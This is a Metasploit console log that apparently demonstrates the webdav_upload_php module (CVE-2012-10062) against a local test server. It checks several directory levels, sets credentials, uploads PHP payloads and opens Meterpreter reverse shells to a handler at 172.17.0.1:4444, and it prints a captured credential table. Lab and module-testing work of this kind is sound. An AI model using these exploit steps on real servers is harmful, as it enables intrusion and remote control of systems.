msf exploit(multi/http/webdav_upload_php) > vulns

Vulnerabilities
===============

Timestamp                Host       Service            Resource  Name               References
---------                ----       -------            --------  ----               ----------
2026-04-08 15:54:16 UTC  127.0.0.1  webdav (8080/tcp)  {}        WebDAV PHP Upload  CVE-2012-10062

msf exploit(multi/http/webdav_upload_php) >
msf exploit(multi/http/webdav_upload_php) > run
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Anonymous authentication for WebDAV
[*] Uploading payload: /level0/7YmvwS8.php
[*] Server: Apache/2.4.66 (Debian)
[*] Attempting to execute payload
[*] Sending stage (42137 bytes) to 172.17.0.2
[+] Deleted 7YmvwS8.php
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:50820) at 2026-04-08 16:54:30 +0100

meterpreter > background
[*] Backgrounding session 1...
msf exploit(multi/http/webdav_upload_php) >
msf exploit(multi/http/webdav_upload_php) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      3         2      1      0      1

msf exploit(multi/http/webdav_upload_php) > vulns

Vulnerabilities
===============

Timestamp                Host       Service            Resource  Name               References
---------                ----       -------            --------  ----               ----------
2026-04-08 15:54:16 UTC  127.0.0.1  webdav (8080/tcp)  {}        WebDAV PHP Upload  CVE-2012-10062
2026-04-08 15:54:30 UTC  127.0.0.1  http (8080/tcp)    {}        WebDAV PHP Upload  CVE-2012-10062

msf exploit(multi/http/webdav_upload_php) >
msf exploit(multi/http/webdav_upload_php) > set URI /level1/
URI => /level1/
msf exploit(multi/http/webdav_upload_php) >
msf exploit(multi/http/webdav_upload_php) > check
[*] Anonymous authentication for WebDAV
[*] Checking for WebDAV: /level1/
[*] Server: Apache/2.4.66 (Debian)
[*] Checking for test file: /level1/pc28hFedZJk4.php
[*] Attempting to upload: /level1/pc28hFedZJk4.php
[*] Checking if created: /level1/pc28hFedZJk4.php
[*] Attempting to delete: /level1/pc28hFedZJk4.php
[!] Error with delete request (HTTP 403, should be 204) - Can't clean up
[+] 127.0.0.1:8080 - The target is vulnerable.
msf exploit(multi/http/webdav_upload_php) >
msf exploit(multi/http/webdav_upload_php) > run
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Anonymous authentication for WebDAV
[*] Uploading payload: /level1/eMzQGi8.php
[*] Server: Apache/2.4.66 (Debian)
[*] Attempting to execute payload
[*] Sending stage (42137 bytes) to 172.17.0.2
[+] Deleted eMzQGi8.php
[*] Meterpreter session 2 opened (172.17.0.1:4444 -> 172.17.0.2:59132) at 2026-04-08 16:55:01 +0100

meterpreter > background
[*] Backgrounding session 2...
msf exploit(multi/http/webdav_upload_php) >
msf exploit(multi/http/webdav_upload_php) > set URI /level4/
URI => /level4/
msf exploit(multi/http/webdav_upload_php) >
msf exploit(multi/http/webdav_upload_php) > check
[*] Anonymous authentication for WebDAV
[*] Checking for WebDAV: /level4/
[-] Target responded: HTTP 401, should be 200
[!] Creds may be required
[*] 127.0.0.1:8080 - Cannot reliably check exploitability.
msf exploit(multi/http/webdav_upload_php) > set USERNAME foo
USERNAME => foo
msf exploit(multi/http/webdav_upload_php) >
msf exploit(multi/http/webdav_upload_php) > check
[*] Using credentials for WebDAV
[*] Checking for WebDAV: /level4/
[-] Target responded: HTTP 401, should be 200
[!] Creds may be incorrect
[*] 127.0.0.1:8080 - Cannot reliably check exploitability.
msf exploit(multi/http/webdav_upload_php) >
msf exploit(multi/http/webdav_upload_php) > set USERNAME level4
USERNAME => level4
msf exploit(multi/http/webdav_upload_php) >
msf exploit(multi/http/webdav_upload_php) > check
[*] Using credentials for WebDAV
[*] Checking for WebDAV: /level4/
[*] Server: Apache/2.4.66 (Debian)
[*] Checking for test file: /level4/U8CGc9glSqK.php
[*] Attempting to upload: /level4/U8CGc9glSqK.php
[*] Checking if created: /level4/U8CGc9glSqK.php
[*] Attempting to delete: /level4/U8CGc9glSqK.php
[+] 127.0.0.1:8080 - The target is vulnerable.
msf exploit(multi/http/webdav_upload_php) >
msf exploit(multi/http/webdav_upload_php) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      3         2      2      0      1

msf exploit(multi/http/webdav_upload_php) > creds
Credentials
===========

id  host       origin     service            public  private   realm  private_type    JtR Format  cracked_password
--  ----       ------     -------            ------  -------   -----  ------------    ----------  ----------------
42  127.0.0.1  127.0.0.1  8080/tcp (webdav)                           Blank password
43  127.0.0.1  127.0.0.1  8080/tcp (webdav)  level4  password         Password

msf exploit(multi/http/webdav_upload_php) > run
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Using credentials for WebDAV
[*] Uploading payload: /level4/0WA3wWf.php
[*] Server: Apache/2.4.66 (Debian)
[*] Attempting to execute payload
[*] Sending stage (42137 bytes) to 172.17.0.2
[+] Deleted 0WA3wWf.php
[*] Meterpreter session 3 opened (172.17.0.1:4444 -> 172.17.0.2:55146) at 2026-04-08 16:56:14 +0100

meterpreter >
```